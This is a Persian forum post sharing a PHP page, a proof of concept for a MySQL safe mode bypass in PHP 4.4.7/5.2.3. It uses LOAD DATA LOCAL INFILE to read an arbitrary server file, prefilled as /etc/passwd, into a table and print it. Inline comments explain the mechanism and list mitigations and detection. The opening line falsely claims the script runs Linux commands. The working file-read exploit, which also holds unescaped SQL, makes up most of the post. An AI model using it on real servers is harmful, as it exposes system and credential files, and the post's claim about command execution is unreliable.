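با استفاده از این اسکریپت می‌تونید کامندهای لینوکس خودتونو از طریق mysql سرور لینوکس اجرا و نتیجه بگیرید. (توضیح: کدی که در ادامه اومده دستوری اجرا نمی‌کنه؛ فقط محتوای یک فایل رو با LOAD DATA LOCAL INFILE داخل یک جدول می‌ریزه و نمایش می‌ده. برای جلوگیری، local_infile رو هم در سرور MySQL و هم در تنظیمات کلاینت PHP غیرفعال کنید.)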
کد:
<!--
  Forum-posted proof of concept. Its own header describes it as a MySQL
  safe mode bypass for PHP 4.4.7 / 5.2.3. The form below collects a database
  name, a MySQL username and password, and a file path (prefilled with
  /etc/passwd), and posts them back to this same script.
-->
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body text="#FFFFFF" bgcolor="#000000"> <p align="center"> <br> <font face="Tahoma" style="font-size: 15pt; font-weight: 700">XXXXXXXX Security Team<br> Mysql Bypass <br> </font><font face="Tahoma" size="2">4.4.7 / 5.2.3 PHP ver - MySQL Safe Mode Bypass Vulnerability<br> Create mysql database and add user for mysql database</font><font face="Tahoma" style="font-size: 10pt; font-weight: 700"><br> </font></p> <div align="center"> <form method="post"> <table border="0" cellspacing="1" width="859" height="6%"> <tr> <td width="311"><font face="Tahoma"><span style="font-size: 9pt"> DataBase Name : <input type="text" name="dbname" size="20"> </span></font></td> <td width="240"><font face="Tahoma"><span style="font-size: 9pt"> Username : <input type="text" name="dbuser" size="20"> </span></font></td> <td width="298"><font face="Tahoma"><span style="font-size: 9pt"> Password : <input type="text" name="dbpass" size="20"></span></font></td> </tr> <tr> <td width="311" valign="middle"> </td> <td width="240" valign="middle"> </td> <td width="298" valign="middle"> </td> </tr> <tr> <td width="554" valign="middle" colspan="2"> <p align="left"><font face="Tahoma"><span style="font-size: 9pt"> File Path : <input type="text" name="path1" size="45" style=" weight:200; height:21; width:229" dir="ltr" value="/etc/passwd"> <input type="submit" value="Bypass" name="exec"></span></font></td> <td width="298" valign="middle"> </td> </tr> <tr> <td width="855" valign="middle" colspan="3"> <br> <? 
// What this block does, in order:
//   1. Proceeds only when dbname, dbuser, dbpass and path1 are all non-empty POST fields.
//   2. Connects to MySQL on localhost with the posted username and password.
//   3. Drops, then recreates, a table named `bypass` in the posted database with a
//      single VARCHAR(2048) column `fileview`.
//   4. Issues LOAD DATA LOCAL INFILE with the posted path, loading into that table.
//   5. Selects every row and echoes the `fileview` column into the textarea.
// It does not run operating-system commands; it only displays the contents of a file.
//
// Why defenders care: with the LOCAL keyword the file is opened by the MySQL client
// library running inside the PHP process rather than by PHP's own file functions.
// NOTE(review): that is presumably why the header calls this a safe mode bypass for
// the listed PHP versions; confirm against the relevant PHP advisory.
//
// Mitigation:
//   - Set local_infile=0 on the MySQL server and turn off the client side as well
//     (mysql.allow_local_infile / mysqli.allow_local_infile in php.ini, and leave
//     PDO::MYSQL_ATTR_LOCAL_INFILE disabled).
//   - Do not grant CREATE / DROP to database accounts used by web applications.
//   - Do not treat safe_mode as a security boundary: it was removed in PHP 5.4,
//     and the mysql_* extension used here was removed in PHP 7.0.
// Detection: LOAD DATA LOCAL statements issued by web-facing accounts in the query
// log, and an unexpected table named `bypass`, are both worth alerting on.
//
// Review notes on the code itself:
//   - All four POST values are placed into SQL text with no escaping or validation.
//   - Return values of the DROP / CREATE / LOAD queries are never checked.
//   - $numrows is assigned but never used.
//   - $row[fileview] uses an unquoted array key, and the value is echoed without
//     HTML escaping.
if(!empty($_POST['dbname']) && !empty($_POST['dbuser']) && !empty($_POST['dbpass']) && !empty($_POST['path1'])) { $dbname = $_POST['dbname']; $dbuser = $_POST['dbuser']; $dbpass = $_POST['dbpass']; $path1 = $_POST['path1']; if(mysql_connect( "localhost", $dbuser, $dbpass )) { $drop= "DROP TABLE $dbname.`bypass`" ; $query = "CREATE TABLE $dbname.`bypass` (`fileview` VARCHAR( 2048 ) NOT NULL);"; mysql_query($drop); mysql_query($query); mysql_query("LOAD DATA LOCAL INFILE " . "'$path1'" . " INTO TABLE " . $dbname . ".bypass"); $result =mysql_db_query($dbname,"SELECT * FROM bypass "); $numrows = mysql_num_rows($result); ?> <textarea rows="15" name="result" cols="103"> <? while($row = mysql_fetch_array($result)) { echo $row[fileview] ; } } } ?> </textarea></td> </tr> </table> </form> </div>